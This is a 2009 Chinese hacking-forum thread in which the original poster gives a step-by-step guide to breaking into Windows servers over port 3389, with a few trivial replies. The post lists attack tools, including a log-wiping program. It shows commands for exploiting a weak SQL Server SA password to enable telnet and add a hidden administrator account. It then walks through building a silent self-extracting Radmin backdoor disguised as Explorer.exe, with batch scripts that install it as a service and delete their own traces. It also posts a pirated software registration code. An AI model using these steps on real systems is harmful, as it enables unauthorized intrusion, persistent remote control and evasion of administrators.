找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1024|回复: 3

高手解析如何入侵3389端口

[复制链接]

30

主题

11

回帖

85

牛毛

初生牛犊

﹎o爺⒋敗纇.

积分
85
发表于 2009-5-28 12:57:24 | 显示全部楼层 |阅读模式 来自 浙江省台州市临海市
这是本人多年下来的经验。  

     工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:  

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及  不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。  

    一.扫到SA弱口令(自动攻击器)  

    二.用SQLTOOLS连上去建一个用户  

net start telnet
开telnet服务
net user mint mint /add  
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员  

    三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)  

制作RAD.EXE过程:  

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;  

2、在本地设置服务端(一定要生成);  

设置密码-->>设置连接端口(默认4489)-->>生成  

3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg;  

4、编写一个批处理,并命名为u.bat;  

@echo offnet stop r_server  

5、写第二个批处理,r.bat,内容为:  

@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del  
rad.exe@del 1.reg@del r.bat@del u.bat  

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;

7、将Rad.rar制作成自解压文件;  

选择Default.sfx的自释放模块-->>高级自释放选项  

-->>常规  

释放路径:%systemroot%\\system32  

安装程序:释放后运行:r.bat 释放前运行u.bat  

-->>摸式  

缄默模式:全部隐藏 覆盖方式:覆盖所有文件  

-->>确定-->>确定  

生成完成。

0

主题

6

回帖

29

牛毛

初生牛犊

积分
29
发表于 2011-6-27 15:29:14 | 显示全部楼层 来自 江苏省镇江市
{:2_40:}{:2_40:}

0

主题

66

回帖

73

牛毛

初生牛犊

积分
73
发表于 2011-6-30 14:26:00 | 显示全部楼层 来自 宁夏中卫市
看看  。。

0

主题

1079

回帖

1279

牛毛

二级牛人

积分
1279
发表于 2011-6-30 21:10:01 | 显示全部楼层 来自 广东省惠州市
就是这样子,还可以了。
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-25 10:19 , Processed in 0.150823 second(s), 48 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表